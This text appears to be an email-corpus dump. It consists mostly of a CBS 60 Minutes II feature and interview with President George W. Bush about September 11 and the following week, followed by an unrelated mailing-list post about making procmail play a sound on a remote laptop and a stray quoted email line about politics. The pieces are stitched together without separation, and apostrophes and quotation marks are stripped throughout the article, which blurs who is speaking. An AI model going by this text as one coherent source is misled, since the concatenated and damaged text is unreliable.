 (CBS)No president since Abraham Lincoln has seen such horrific loss of 
 life in a war on American soil. No president since James Madison, nearly 
 200 years ago, has seen the nations capital city successfully attacked. 
 But, one year ago, President George W. Bush was thrown into the first 
 great crisis of the 21st century.
 This is the presidents story of September 11th and the week America 
 went to war. 60 Minutes II spent two hours with Mr. Bush, one, on Air 
 Force One and another in the Oval Office last week. Even after a year, 
 the president is still moved, sometimes to the point of tears, when he 
 remembers Sept. 11.
 I knew, the farther we get away from Sept.11, the more likely it is for 
 some around the world to forget the mission, but not me, Mr. Bush says 
 during the Air Force One interview. Not me. I made the pledge to myself 
 and to people that Im not going to forget what happened on Sept. 11. So 
 long as Im president, we will pursue the killers and bring them to 
 justice. We owe that to those who have lost their lives.
 The memories come back sharp and clear on Air Force One, where Pelley 
 joined the president for a recent trip across country. 60 Minutes II 
 wanted to talk to him there because that is where he spent the first 
 hours after the attack.
 Not since Lyndon Johnson was sworn in on Air Force One has the airplane 
 been so central to America in a crisis.
 For President Bush, Sept. 11 2001, started with the usual routine. 
 Before dawn, the president was on his four-mile run. It was just before 
 6 a.m. and, at the same moment, another man was on the move: Mohammad 
 Atta. Two hours later, as Mr. Bush drove to an elementary school, 
 hijackers on four planes were murdering the flight crews and turning the 
 airliners east. As the motorcade neared the school at 8:45 a.m., jet 
 engines echoed in Manhattan.
 Atta plunged the 767 jumbo jet into World Trade Center Tower One.
 I thought it was an accident, says Mr. Bush. I thought it was a pilot 
 error. I thought that some foolish soul had gotten lost and - and made a 
 terrible mistake.
 Mr. Bush was told about the first plane just before sitting down with a 
 class of second graders. He was watching a reading drill when, just 
 after nine, United Flight 175 exploded into the second tower. There was 
 the sudden realization that what had seemed like a terrible mistake was 
 a coordinated attack.
 Back in the Florida classroom, press secretary Ari Fleischer got the 
 news on his pager. The presidents chief-of-staff, Andy Card stepped in.
 A second plane hit the second tower; America is under attack, Card 
 told the president
 When he said those words, what did he see in the Presidents face?
 I saw him coming to recognition of what I had said, Card recalls. I 
 think he understood that he was going to have to take command as 
 commander-in-chief, not just as president.
 What was going through Bushs mind when he heard the news?
 Were at war and somebody has dared attack us and were going to do 
 something about it, Mr. Bush recalls. I realized I was in a unique 
 setting to receive a message that somebody attacked us, and I was 
 looking at these little children and all of the sudden we were at war. I 
 can remember noticing the press pool and the press corps beginning to 
 get the calls and seeing the look on their face. And it became evident 
 that we were, you know, that the world had changed.
 Mr. Bush walked into a classroom set up with a secure phone. He called 
 the vice president, pulling the phone cord tight as he spun to see the 
 attack on TV. Then he grabbed a legal pad and quickly wrote his first 
 words to the nation.
 "Ladies and gentlemen, this is a difficult moment for America, he said 
 in the speech. Today, weve had a national tragedy.
 It was 9:30 a.m. As he spoke, Mr. Bush didnt know that two more 
 hijacked jets were streaking toward Washington. Vice Pesident Dick 
 Cheney was in his office at the White House when a Secret Service agent 
 ran in.
 He said to me, Sir, we have to leave immediately and grabbed, put a 
 hand on my belt, another hand on my shoulder and propelled me out the 
 door of my office, Cheney recalls. Im not sure how they do it, but 
 they sort of levitate you down the hallway, you move very fast.
 There wasnt a lot of time for chitchat, you know, with the vice 
 president, says Secret Service Director Brian Stafford, who was in his 
 command center ordering the round-up of top officials and the First 
 Family. He felt that he had only minutes to work with. We knew there 
 were unidentified planes tracking in our direction, he says.
 Cheney was rushed deep under the White House into a bunker called the 
 Presidential Emergency Operations Center. It was built for war, and this 
 was it. On her way down, National Security Advisor Condoleezza Rice 
 called Mr. Bush.
 It was brief because I was being pushed to get off the phone and get 
 out of the West Wing, says Rice. They were hurrying me off the phone 
 with the president and I just said, he said, Im coming back and we 
 said Mr. President that may not be wise. I remember stopping briefly 
 to call my family, my aunt and uncle in Alabama and say, Im fine. You 
 have to tell everybody that Im fine but then settling into trying to 
 deal with the enormity of that moment, and in the first few hours, I 
 think the thing that was on everybodys mind was how many more planes 
 are coming.
 The Capitol was evacuated. And for the first time ever, the Secret 
 Service executed the emergency plan to ensure the presidential line of 
 succession. Agents swept up the 15 officials who stood to become 
 president if the others were killed. They wanted to move Vice President 
 Cheney, fearing he was in danger even in the bunker. But Cheney says 
 when he heard the other officials were safe, he decided to stay at the 
 White House, no matter what.
 Its important to emphasize it's not personal, you dont think of it in 
 personal terms, youve got a professional job to do, says Cheney.
 Cheney was joined by transportation secretary Norm Mineta who remembers 
 hearing the FAA counting down the hijacked jets closing in on the 
 capital.
 Says Mineta: Someone came in and said Mr. Vice president theres a 
 plane 50 miles out, then he came in and said Its now 10 miles out, we 
 dont know where it is exactly, but its coming in low and fast.
 It was American Flight 77. At 9:38 a.m., it exploded into the Pentagon, 
 the first successful attack on Washington since the War of 1812.
 As the Pentagon burned, Mr. Bushs limousine sped toward Air Force One 
 in Florida. At that moment, United Flight 93 - the last hijacked plane - 
 was taking dead aim at Washington. At the White House, the staff was in 
 the West Wing cafeteria, watching on TV. Press Secretary Jennifer 
 Millerwise was in the crowd when the order came to evacuate.
 I no sooner walked outside when someone from the Secret Service yelled 
 Women drop your heels and run, drop your heels and run, and suddenly 
 the gates that never open except for authorized vehicles just opened and 
 the whole White House just flooded out, she recalls.
 In Florida, as Mr. Bush boarded Air Force One, he was overheard telling 
 a Secret Service agent Be sure to get the First Lady and my daughters 
 protected. At 9:57 a.m., Air Force One thundered down the runway, 
 blasting smoke and dust in a full -hrust take off. Communications 
 Director Dan Bartlett was on board.
 It was like a rocket, he remembers. For a good ten minutes, the plane 
 was going almost straight up.
 At the same moment, 56 minutes after it was hit, World Trade Center 
 Tower Two began to falter, then cascade in an incomprehensible avalanche 
 of steel, concrete and human lives.
 Someone said to me, Look at that I remember that, Look at that and 
 I looked up and I saw and I just remember a cloud of dust and smoke and 
 the horror of that moment, recalls Rice of the TV newscast.
 She also felt something in her gut: That weve lost a lot of Americans 
 and that eventually we would get these people. I felt the anger. Of 
 course I felt the anger.
 Down in the bunker, Cheney was trying to figure out how many hijacked 
 planes there were. Officials feared there could be as many as 11.
 As the planes track toward Washington, a discussion begins about whether 
 to shoot them down. I discussed it with the president, Cheney 
 recalls. Are we prepared to order our aircraft to shoot down these 
 airliners that have been hijacked? He said yes.
 It was my advice. It was his decision, says Cheney.
 Thats a sobering moment to order your own combat aircraft to shoot 
 down your own civilian aircraft, says Bush. But it was an easy 
 decision to make given the  given the fact that we had learned that a 
 commercial aircraft was being used as a weapon. I say easy decision, it 
 was, I didnt hesitate, let me put it that way. I knew what had to be 
 done.
 The passengers on United Flight 93 also knew what had to be done. They 
 fought for control and sacrificed themselves in a Pennsylvania meadow. 
 The flight was 15 minutes from Washington.
 Clearly, the terrorists were trying to take out as many symbols of 
 government as they could: the Pentagon, perhaps the Capitol, perhaps the 
 White House. These people saved us not only physically but they saved us 
 psychologically and symbolically in a very important way, too, says 
 Rice.
 Meanwhile, Tower One was weakening. It had stood for an hour and 43 
 minutes. At 10:29 a.m., it buckled in a mirror image of the collapse of 
 its twin.
 The image that went round the world reached the First Lady in a secure 
 location somewhere in Washington. I was horrified, she says. I 
 thought, Dear God, protect as many citizens as you can. It was a 
 nightmare.
 By 10:30 a.m., Americas largest city was devastated, its military 
 headquarters were burning. Air force One turned west along the Gulf 
 Coast.
 I can remember sitting right here in this office thinking about the 
 consequences of what had taken place and realizing it was the defining 
 moment in the history of the United States, says President Bush. I 
 didnt need any legal briefs, I didnt need any consultations, I knew we 
 were at war.
 Mr. Bush says the first hours were frustrating. He watched the 
 horrifying pictures, but the TV signal was breaking up. His calls to 
 Cheney were cutting out. Mr. Bush says he pounded his desk shouting, 
 This is inexcusable; get me the vice president.
 I was trying to clear the fog of war, and there is a fog of war, says 
 the president. "Information was just flying from all directions.
 Chief of staff Card brought in the reports. There was word Camp David 
 had been hit. A jet was thought to be targeting Mr. Bushs ranch.
 I remember hearing that the State Department might have been hit, or 
 that the White House had a fire in it. So we were hearing lots of 
 different information, says Card.
 They also feared that Air Force One itself was a target. Cheney told the 
 president there was a credible threat against the plane. Using the code 
 name for Air Force One, Mr. Bush told an aide, Angel is next. The 
 threat was passed to presidential pilot Colonel Mark Tillman.
 It was serious before that but now it is -no longer is it a time to get 
 the president home, Tillman says. We actually have to consider 
 everything we say, everything we do could be intercepted, and we have to 
 make sure that no one knows what our position is.
 Tillman asked for an armed guard at his cockpit door while Secret 
 Service agents double-checked the identity of everyone on board. The 
 crew reviewed the emergency evacuation plan. Then came a warning from 
 air traffic control  a suspect airliner was dead ahead.
 Coming out of Sarasota there was one call that said there was an 
 airliner off our nose that they did not have contact with, Tillman 
 remembers.
 Tillman took evasive action, pulling his plane high above normal 
 traffic. They were on course for Washington, but by now no one thought 
 that was a good idea, except the president.
 I wanted to come back to Washington, but the circumstances were such 
 that it was just impossible for the Secret Service or the national 
 security team to clear the way for Air Force One to come back, says 
 Bush.
 So Air Force One set course for an underground command center in 
 Nebraska. Back in Washington, the presidents closest advisor, Karen 
 Hughes, heard about the threat to the plane and placed a call to Mr. 
 Bush.
 And the military operator came back to me and in a voice that, to me, 
 sounded very shaken said, Maam, Im sorry, we cant reach Air Force 
 One. Hughes recalls. Hughes was out of the White House during the 
 attacks. When she came back, it was a place she didnt recognize.
 There were either military, or maybe Secret Service, dressed all in 
 black, holding machine guns as, as we drove up. And I never expected to 
 see something like that in, in our nation's capital, says Hughes.
 When she walked into the White House, no one was inside. I knew it was 
 a day that you didn't want to surprise anybody, and so I yelled, 
 Hello? and two, again, kind of SWAT team members came running, running 
 through the, the hall with, again, guns drawn, and then took me to, to 
 the location where I met the vice president.
 On Air Force One, Col. Tillman had a problem. He needed to hide the most 
 visible plane in the world, a 747 longer than the White House itself. He 
 didnt want to use his radio, because the hijackers could be listening 
 to air traffic control. So he called air traffic control on the 
 telephone.
 We actually didn't tell them our destination or what directions we were 
 heading, says Tillman. We, we basically just talked to 'em and said, 
 'OK, fine, we have no clearance at this time, we are just going to fly 
 across the United States.'
 Controllers passed Air Force One from one sector to another, warning 
 each other to keep the route secret.
 OK, wheres he going? one tower radioed to another.
 Just watch him, a second tower responded. Dont question him wheres 
 he's going. Just work him and watch him, theres no flight plan in and 
 were not going to put anything in. Ok, sir?
 Air Force One ordered a fighter escort, and air traffic control radioed 
 back: Air Force One, got two F-16s at about your 10 oclock position.
 The staff, and the president and us, were filed out along the outside 
 hallway of his presidential cabin there and looking out the windows, 
 says Bartlett. And the president gives them a signal of salute, and the 
 pilot kind of tips his wing, and fades off and backs into formation.
 The men in the F-16s were Shane Brotherton and Randy Roberts, from the 
 Texas Air National Guard. Their mission was so secret their commander 
 wouldnt tell them where they were going.
 He just said, 'Youll know when you see it,' and that was my first 
 clue, I didnt have any idea what we were going up until that point, 
 says Brotherton. He knew when he saw it.
 We, we were trying to keep an 80-mile bubble, bubble around Air Force 
 One, and we'd investigate anything that was within 80 miles, says 
 Roberts.
 Bush says he was not worried about the safety of the people on this 
 aircraft, or for his own safety: I looked out the airplane and saw two 
 F-16s on each wing. It was going to have to be a pretty good pilot to 
 get us.
 We now know that the threat to Air Force One was part of the fog of war, 
 a false alarm. But it had a powerful effect at the time. Some wondered, 
 with the president out of sight, was he still running the government? He 
 hadnt appeared after the attack on Washington. Mr. Bush was clearly 
 worried about it. At one point he was overheard saying, The American 
 people want to know where their dang president is. The staff considered 
 an address to the nation by phone but instead Mr. Bush ordered Air Force 
 One to land somewhere within 30 minutes so he could appear on TV. At 
 11:45 a.m., they landed at Barksdale Air Force Base in Louisiana.
 The resolve of our great nation is being tested. But make no mistake, 
 we will show the world that we will pass this test. God bless, Bush 
 said to the nation from Barksdale.
 At Barksdale, the Secret Service believed the situation in Washington 
 was still unsafe. So the plane continued on to Nebraska, to the command 
 center where Mr. Bush would be secure and have all the communications 
 gear he needed to run the government. Aboard Air Force One, Mr. Bush had 
 a job for press secretary Fleischer.
 The president asked me to make sure that I took down everything that 
 was said. I think he wanted to make certain that a record existed, says 
 Fleischer
 Fleischers notes capture Mr. Bushs language, plain and unguarded. To 
 the vice president he said: Were at war, Dick, were going to find out 
 who did this and kick their ass. Another time, Mr. Bush said, Were 
 not going to have any slap-on-the-wrist crap this time.
 The President adds, I can remember telling the Secretary of Defense, I 
 said, Were going to find out who did this and then Mr. Secretary, you 
 and Dick Myers, who we just named as chairman of the joint chiefs, are 
 going to go get them.
 By 3 p.m., Air Force One touched down at Offutt Air Force Base in 
 Nebraska. Mr. Bush and his team were herded into a small brick hut that 
 gave no hint of what they would find below.
 At the bottom of the stairs was the U.S. Strategic Command Underground 
 Command Center. It was built to transmit a presidents order to go to 
 nuclear war. But when Mr. Bush walked in, the battle staff was watching 
 the skies over the United States. Many airplanes had still not landed. 
 After a short briefing, Mr. Bush and Card were taken to a teleconference 
 center which connected them to the White House, the Pentagon, the FBI 
 and the CIA. Mr. Bush had a question for his CIA Director George Tenent.
 According to Rice, Bush asked Tenent who had done this. Rice recalls 
 that Tenent answered: Sir, I believe its al Qaeda. Were doing the 
 assessment but it looks like, it feels like, it smells like al Qaeda.
 The evidence would build. FBI Director Robert Mueller says that an 
 essential clue came from one of the hijacked planes before it crashed.
 A flight attendant on American Flight 11, Amy Sweeney, had the presence 
 of mind to call her office as the plane was hijacked and give them the 
 seat numbers of the hijackers. That was the first piece of hard 
 evidence. We could then go to the manifest, find out who was sitting in 
 those seats and immediately conduct an investigation of those 
 individuals, as opposed to taking all the passengers on the plane and 
 going through a process of elimination, says Mueller.
 In Nebraska, the White House staff was preparing for an address to the 
 nation from the Air Force bunker, but by then the president had had 
 enough. He decided to come back.
 At one point, he said he didnt want any tinhorn terrorist keeping him 
 out of Washington, Fleischer says. That verbatim.
 On board, he was already thinking of issuing an ultimatum to the world: 
 I had time to think and a couple of thoughts emerged. One was that 
 you're guilty if you harbor a terrorist, because I knew these terrorists 
 like al-Qaeda liked to prey on weak government and weak people. The 
 other thought that came was the opportunity to fashion a vast coalition 
 of countries that would either be with us or with the terrorists.
 As Air Force One sped east, the last casualty of the attack on America 
 collapsed, one of the nations worst days wore into evening. At the 
 World Trade Center, 2,801 were killed; at the Pentagon, 184; and in 
 Pennsylvania 40. Altogether, there were 3,025 dead.
 Anybody who would attack America the way they did, anybody who would 
 take innocent life the way they did, anybody who's so devious, is evil, 
 Bush said recently.
 Mr. Bush would soon see that evil face to face. After arriving in 
 Washington, he boarded his helicopter and flew past the Pentagon on the 
 way to the White House.
 Was there a time when he was afraid that there might not be a White 
 House to return to? I dont remember thinking about whether or not the 
 White House would have been obliterated," he recalls. "I think I might 
 have thought they took their best shot, and now it was time for us to 
 take our best shot.
 Mr. Bush arrived back at the White House nine hours after the attacks. 
 His next step was an address to the nation. Karen Hughes and her staff 
 were already working on the speech.
 He decided that the primary tone he wanted to strike that night was 
 reassurance, remembers Hughes. We had to show resolve, we had to 
 reassure people, we had to let them know that we would be OK.
 Just off the Oval Office, Mr. Bush added the words that would become 
 known as the Bush Doctrine - no distinction between terrorists and those 
 who harbor them. The staff wanted to add a declaration of war but Mr. 
 Bush didnt think the American people wanted to hear it that night and 
 he was emphatic about that.
 He prepared to say it from the same desk where Franklin Roosevelt first 
 heard the news of Pearl Harbor. Now Bush was commander in chief. Eighty 
 million Americans were watching.
 Today our fellow citizens, our way of life, our very freedom came under 
 attack in a series of deliberate and deadly terrorist acts, he said 
 from the Oval Office that night.
 The Oval Office speech came at the end of the bloodiest day in American 
 history since the Civil War. Before he walked to the White House 
 residence for the night, Mr. Bush dictated these words for the White 
 House daily log: The Pearl Harbor of the 21st century took place today. 
 We think it's Osama bin Laden.
 (CBS)When Sept. 12 dawned, President Bush was demanding a war plan. No 
 one in the White House or the Pentagon could be sure of what the 
 president would do. In office for just eight months, hed never been 
 tested as commander-in-chief.
 I never asked them what they thought, President Bush said of the 
 Pentagon brass, because I didnt really  because I knew what I was 
 gonna do. I knew exactly what had to be done, Scott. And that was to set 
 a strategy to seek justice. Find out who did it, hunt them down and 
 bring them to justice.
 In the cabinet room, the president made clear what was next: The 
 deliberate and deadly attacks which were carried out yesterday against 
 our country were more than acts of terror, they were acts of war, he 
 said.
 To the war cabinet, al Qaeda was no surprise. National Security Advisor 
 Condoleezza Rice says the administration had been at work on a plan to 
 strike bin Ladens organization well before Sept. 11.
 The president said, You know Im tired of swatting at flies, I need a 
 strategy to eliminate these guys, Rice recalls.
 In one of the worst intelligence failures ever, the CIA and FBI didnt 
 pick up clues that an attack in the United States was imminent. Without 
 a sense of urgency, the White House strategy the president had asked for 
 came too late.
 Chief of Staff Andrew Card recalls that the plan Mr. Bush had asked for 
 was literally headed to the presidents desk, I think, on the eleventh, 
 tenth or eleventh, of September.
 On Sept. 12, the war cabinet was debating the full range of options - 
 who to hit and how to hit them. There were some at the Pentagon who 
 worried in the early hours that Mr. Bush would order up an immediate 
 cruise missile strike, of the kind that had not deterred bin Laden in 
 the past.
 Well, theres a lot of nervous Nellies at the Pentagon, anyway, Mr. 
 Bush tells Pelley. A lot of people like to chatter, you know, more than 
 they should. But no, I appreciate that very much. Secretary of Defense 
 (Donald) Rumsfeld early on discussed the idea of making sure we had what 
 we called boots on the ground. That if youre gonna go to war, then 
 youve gotta go to war with all your assets.
 The president says he wanted to fight and win a guerilla war with 
 conventional means.
 It was an innovative but risky idea being proposed by CIA Director 
 George Tenent. Tenent wanted to combine American technology and 
 intelligence with the brute force of Afghan fighters hostile to the 
 Taliban government.
 Secretary of State Colin Powell, noting that the CIA had already 
 developed a long relationship with the Afghan resistance, called it an 
 unconventional solution to an unconventional problem.
 As I like to describe it to my friends, Powell says, we had on the 
 ground a Fourth World army riding horses and living in tents with some 
 CIA and special forces with them and we had a First World air force, the 
 best in the world. How do you connect it all?
 The president gave them 48 hours to figure it out.
 Meanwhile, Mr. Bush went to the battlefield himself. Just the day 
 before, he had called the Pentagon the mightiest building in the 
 world. Now one-fifth of it was in ruins. The wreckage of American 
 Flight 77 was being examined by Navy investigators. And before Mr. Bush 
 left, he made a point of speaking personally with the team recovering 
 the remains of the first casualties of war on his watch.
 The next day, Sept. 13, there was another warning of attack that the 
 public never heard about. Threats had been were coming in constantly but 
 this one sounded credible: a large truck bomb headed to the White House. 
 The Secret Service wanted the president back in the bunker.
 He wasnt real receptive to that, to that recommendation, remembers 
 Brian Stafford, director of the Secret Service. And he ordered a 
 hamburger and said he was going to stay in the White House that evening 
 and thats what he did.
 The next day, would be one of the longest and the most difficult for the 
 president. On Friday, Sept. 14, Mr. Bush started the day with a cabinet 
 meeting, but he wept when he walked in and was surprised by applause.
 He sat down, slightly overcome, for a moment but he recaptured it, 
 says Powell who remembers being worried that the president might have 
 trouble getting through his speech at the national memorial service 
 later that morning.
 And I just scribbled a little note to him, Powell recalls, and I 
 said, Mr. President, Ive learned over the years when you are going to 
 give a very emotional speech, watch out for certain words that will 
 cause you to start to tear up. He looked at me and he smiled and then 
 at the next break in the conversation he said, The Secretary of State 
 told me not to break down at the memorial service, and that broke the 
 tension and everybody started laughing and I felt embarrassed.
 First Lady Laura Bush was involved in planning the memorial service and 
 she says she wanted it to be both dignified and comforting. I wanted 
 the Psalms and everything to be read to be comforting, because I think 
 we were a country, that needed, everyone of us, needed comforting.
 It also stirred the mourners resolve, as Rice remember. As we stood to 
 sing the Battle Hymn of the Republic, she says, you could feel the 
 entire congregation and I could certainly feel myself stiffen, the kind 
 of spine, and this deep sadness was being replaced by resolve.
 We all felt that we still had mourning to do for our countrymen who had 
 been lost but that we also had a new purpose in not just avenging what 
 had happened to them but making certain that the world was eventually 
 going to be safe from this kind of attack ever again.
 Next came a visit to ground zero. The president was not prepared for 
 what he encountered there.
 You couldnt brief me, you couldnt brief anybody on ground zero until 
 you saw it," Mr. Bush says. It was like  it was ghostly. Like youre 
 having a bad dream and youre walking through the dream.
 The president found the scene very powerful, particularly when the men 
 and women at ground zero began to chant, USA! USA!.
 There was a lot of bloodlust, the president recalls. People were, you 
 know, pointing their big old hands at me saying, Dont you ever forget 
 this, Mr. President. Dont let us down. The scene was very powerful. 
 Very powerful.
 When Mr. Bush tried to speak, the crowd kept shouting, We cant hear 
 you.
 The president responded, I can hear you. I can hear you. The rest of 
 the world hears you. And the people who knocked these buildings down 
 will hear all of us soon.
 Mr. Bush had been in New York just a few weeks before; hed posed with 
 the firemen who always stood by whenever the presidents helicopter 
 landed there. Now, five of the men who stood with the president in the 
 picture were dead  lost at ground zero.
 When the president arrived Sept. 14, Manhattan was papered with the 
 faces of the lost. Families, unable to believe that so many had vanished 
 in an instant, held onto the hope that their loved ones were just 
 missing. It was a place where a child comforted a grieving mother.
 At a meeting the public never saw, the president spoke with several 
 hundred of these families in a convention hall.
 People said to me, Hell come out. Dont worry, Mr. president, well 
 see him soon. I know my loved one, he will - hell find a place to 
 survive underneath the rubble and well get him out. I, on the other 
 hand had been briefed about the realities, and my job was to hug and 
 cry, but I remember the whole time thinking, This is incredibly sad 
 because the loved ones wont come out.
 One little boy handed the president a picture of his father in his 
 firefighter uniform and as he signed it, Mr. Bush remembers, he told the 
 boy, Your daddy wont believe that I was here, so you show him that 
 autograph.
 It was an effort to provide a little hope, the president recalls. I 
 still get emotional thinking about it because were dealing with people 
 who loved their dads or loved their mom, or loved theirwives who loved 
 their husbands. It was a tough time, you know, it was a tough time for 
 all of us because we were a very emotional, and I was emotional at 
 times. I felt, I felt the same now as I did then, which is sad. And I 
 still feel sad for those who grieve for their families, but through my 
 tears, I see opportunity.
 The president was supposed to be with the families for about 30 minutes; 
 he stayed for two and a half hours. It was there he met Arlene Howard. 
 The body of her son, George, was among the first to be found at ground 
 zero.
 I called the police department, Howard remembers,  and they said he 
 hadnt called in for roll call and to call back in an hour and I said, 
 No, I dont need to call back. If he hadnt called in, I knew where he 
 was.
 George Howard had rescued children trapped in an elevator back in 1993 
 when the World Trade Center was bombed. He had been off duty that day, 
 and he was off duty on Sept. 11, but couldnt stay away. The police 
 department gave his badge to his mother and she gave it to the president.
 He (the president) he leaned over to talk to me, Howard recalls. And 
 he extends his sympathy to me and thats when I asked him Id like to 
 present Georges shield to him in honor of all the men and women who 
 were killed over there.
 By the end of that day, Mr. Bush flew to Camp David visibly drained.
 He was physically exhausted, he was mentally exhausted, he was 
 emotionally exhausted, he was spiritually exhausted, recalls Card..
 The next day  Saturday, Sept. 15 - Mr. Bush met members of his war 
 cabinet at the presidential retreat for a last decisive meeting.
 My message is for everybody who wears the uniform  get ready. The 
 United States will do what it takes, Mr. Bush told them.
 As Powell remembers it, He was encouraging us to think boldly. He was 
 listening to all ideas; he was not constrained to any one idea; he 
 wanted to hear his advisors talk and argue and debate with each other.
 President Bush was pleased with the progress that had been made. On the 
 other hand, he says, I wanted to clarify plans and I went around the 
 room and I asked everybody what they thought ought to happen.
 When he left that meeting on Saturday night, he still had not told the 
 cabinet what he was planning.
 I wanted to just think it through, Mr. Bush remembers. Any time you 
 commit troops to harms way, a president must make sure that he fully 
 understands all the consequences and ramifications. And I wanted to just 
 spend some time on it alone. And did.
 What were his reservations?
 Mr. Bush says, Could we win? I didnt want to be putting our troops in 
 there unless I was certain we could win. And I was certain we could win.
 Nine days after the attacks on America, before a joint session of 
 Congress the president committed the nation to the war on terror.
 Each of us will remember what happened that day and to whom it 
 happened, Mr. Bush told the Congress and the nation. Well remember 
 the moment the news came, where we were and what we were doing. Some 
 will remember an image of a fire or a story of rescue. Some will carry 
 memories of a face and a voice gone forever. And I will carry this. It 
 is the police shield of a man named George Howard, who died at the World 
 Trade Center trying to save others. It was given to me by his mom, 
 Arlene, as a proud memorial to her son. It is my reminder of lives that 
 ended and a task that does not end.
 A year has passed since then, but the president says his job is still to 
 remind Americans of what happened and of the war that is still being 
 waged, a war he reminds himself of every day in the Oval Office, 
 literally keeping score, one terrorist at a time.
 In his desk, the president says, I have a classified document that 
 might have some pictures on there, just to keep reminding me about whos 
 out there, where they might be
 And as the terrorists are captures or killed? I might make a little 
 check there, yeah, Mr. Bush admits.
 But there is no check by the name that must be on the top of that list  
 Osama bin Laden.
 (CBS)A lot has happened in the year since Sept. 11. One year ago, the 
 president was new on the job, with little experience in foreign policy. 
 He had wanted to pull the military back from foreign entanglements. Now, 
 on his orders, U.S. forces are engaged around the globe in a war he did 
 not expect, in a world completely changed. In the Oval Office last week, 
 CBS News Correspondent Scott Pelley asked the president about Iraq, 
 about whether Americans are safe at home and about Osama bin Laden.
 ------------------------------------------------------------------------
 Scott Pelley: You must be frustrated, maybe angry. After a year, we 
 still dont have Osama Bin Laden?
 President Bush: How do you know that? I dont know whether Osama bin 
 Laden is dead or alive. I dont know that. Hes not leading a lot of 
 parades. And hes not nearly the hero that a lot of people thought he 
 was. This is much bigger than one person anyway. This is  were slowly 
 but surely dismantling and disrupting the al Qaeda network that, that 
 hates America. And we will stay on task until we complete the task. I 
 always knew this was a different kind of war, Scott. See, in the old 
 days, you measure the size and the strength of the enemy by counting his 
 tanks or his airplanes and his ships. This is an international manhunt. 
 Were after these people one at the time. Theyre killers. Period.
 Pelley: But have you won the war before you find Osama bin Laden dead or 
 alive?
 Mr. Bush: If he were dead, theres somebody else to replace him. And we 
 would find that person. But slowly but surely, we will dismantle the al 
 Qaeda network. And those who sponsor them and those who harbor them. And 
 at the same time, hopefully lay the seeds for, the conditions necessary 
 so that people dont feel like theyve got to conduct terror to achieve 
 objectives.
 Pelley: Do you look back on the Afghan campaign with any doubts? 
 Certainly, weve overthrown the Taliban government. Certainly, al Qaeda 
 has been scattered. But some of the Taliban leaders appear to have 
 gotten away. And there have been many civilian casualties as well.
 Mr. Bush: Uh huh. Well, you know, I am sad that civilians lost their 
 life. But I understand war. We did everything we can to  everything we 
 could to protect people. When civilians did die, it was because of a 
 mistake. Certainly not because of intention. We liberated a country for 
 which Im extremely proud. No,  I dont second guess things. Its  
 things never go perfect in a time of war.
 Pelley: Are you committed to ending the rule of Saddam Hussein?
 Mr. Bush: Im committed to regime change.
 Pelley: There are those who have been vocal in their advice against war 
 in Iraq. Some of our allies in the Gulf War, Saudi Arabia, Turkey for 
 example. Even your fathers former national security advisor, Mr. 
 Scowcroft has written about it in the paper. What is it in your 
 estimation that they dont understand about the Iraq question that you 
 do appreciate?
 Mr. Bush: The policy of the government is regime change, Scott, hasnt 
 changed. I get all kinds of advice. Im listening to the advice. I 
 appreciate the consultations. And well consult with a lot of people but 
 our policy hasnt changed.
 Pelley: On Air Force One you described the terrorists as evil.
 Mr. Bush: Yeah.
 Pelley: I dont think anyone would disagree with that, but at the same 
 time, many in the Arab world are angry at the United States for 
 political reasons because of our policy in Israel or our troops in the 
 oil region of the Middle East. Is there any change in foreign policy 
 that youre considering that might reduce Arab anger against the United 
 States.
 Mr. Bush: Hmm. Well, Im working for peace in the Middle East. Im the 
 first president that ever went to the United Nations and publicly 
 declared the need to have a Palestinian state living side-by-side with 
 Israel in peace. Ive made it clear that in order for there to be peace 
 the Palestinians have gotta to get some leadership that renounces terror 
 and believes in peaces and quits using the Palestinian people as pawns. 
 I've also made it clear to the other Arab nations in the region that 
 theyve got responsibilities. If you want peace they gotta work toward 
 it. Were more than willing to work for it, but they have to work for it 
 as well. But all this business isnt going to happen as long as a few 
 are willing to blow up the hopes of many. So we all gotta work to fight 
 off terror.
 Pelley: Arafat has to go?
 Mr. Bush: Either, hes, hes been a complete failure as far as I am 
 concerned. Utter disappointment.
 Pelley: There has been some concern over the year about civil liberties.
 Mr. Bush: Yeah
 Pelley: In fact, an appeals court recently was harsh about your 
 administrations decision to close certain deportation hearings. They 
 said, quote, A government operating in secrecy stands in opposition to 
 the Constitution. Where do you draw the line sir?
 Mr. Bush: I draw the line at the Constitution. We will protect America. 
 But we will do so on, within the guidelines of the Constitution, 
 confines of the Constitution, spirit of the Constitution.
 Pelley: Is there anything that the Justice Department has brought to you 
 as an idea that youve thought, No, thats too far. I dont wanna go"
 Mr. Bush: Nah, not that that I remember. And I am pleased with the 
 Justice Department. I think that Attorney Generals doing a fine job, by 
 the way...and to the extent that our courts are willing to make sure 
 that they review decisions we make, I think thats fine. I mean, thats 
 good. Its healthy. Its part of America.
 Pelley: Franklin Roosevelt said that America should stand in defense of 
 four freedoms. Freedom of speech, freedom of religion, freedom from want 
 and freedom from fear. Do we have that today Mr. President? Freedom from 
 fear?
 Mr. Bush: I think more than we did, in retrospect. The fact that we are 
 on alert, the fact that we understand the new circumstances makes us 
 more free from fear than on that fateful day of September the 11th. 
 Weve got more work to do.
 Pelley: And Americans should not live their lives in fear?
 Mr. Bush: I dont think so. No. I think Americans oughta know their 
 governments doing everything possible to help. And obviously if we get 
 information that relates directly a particular attack well deal with 
 it. And if we get noise that deals with a general attack, well alert 
 people. There are a lot of good folks working hard to disrupt and deny 
 and run down leads. And the American people need to go about their 
 lives. It seems like they are.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ringing bell on other computer
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 succeeded in ringing a bell anytime I get a mail
 to my inbox (Not Mailing lists, spams etc.) by
 using procmail to execute a "play clink.wav" on
 the "right" mails.
 Now my demands are growing ;-)
 I use my laptop remotely very often and now I would
 like the bell to sound on that when I am there.
 I triedto use the KDE remote sound server and it works in
 the tests, but when procmail runs it it doesn't, presumably
 as it doesn't have the authorization to communicate with
 the laptop, beeing another user?
 Any hints.
 BRGDS
 -- 
 Dag Nygren                               email: dag@newtech.fi
 Oy Espoon NewTech Ab                     phone: +358 9 8024910
 Trsktorpet 3                              fax: +358 9 8024916
 02360 ESBO                              Mobile: +358 400 426312
 FINLAND
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman &lt;geege@barrera.org&gt; writes:
     G&gt; SURELY you meant political extremes and not politics?  baisley?
     G&gt; help me out here.
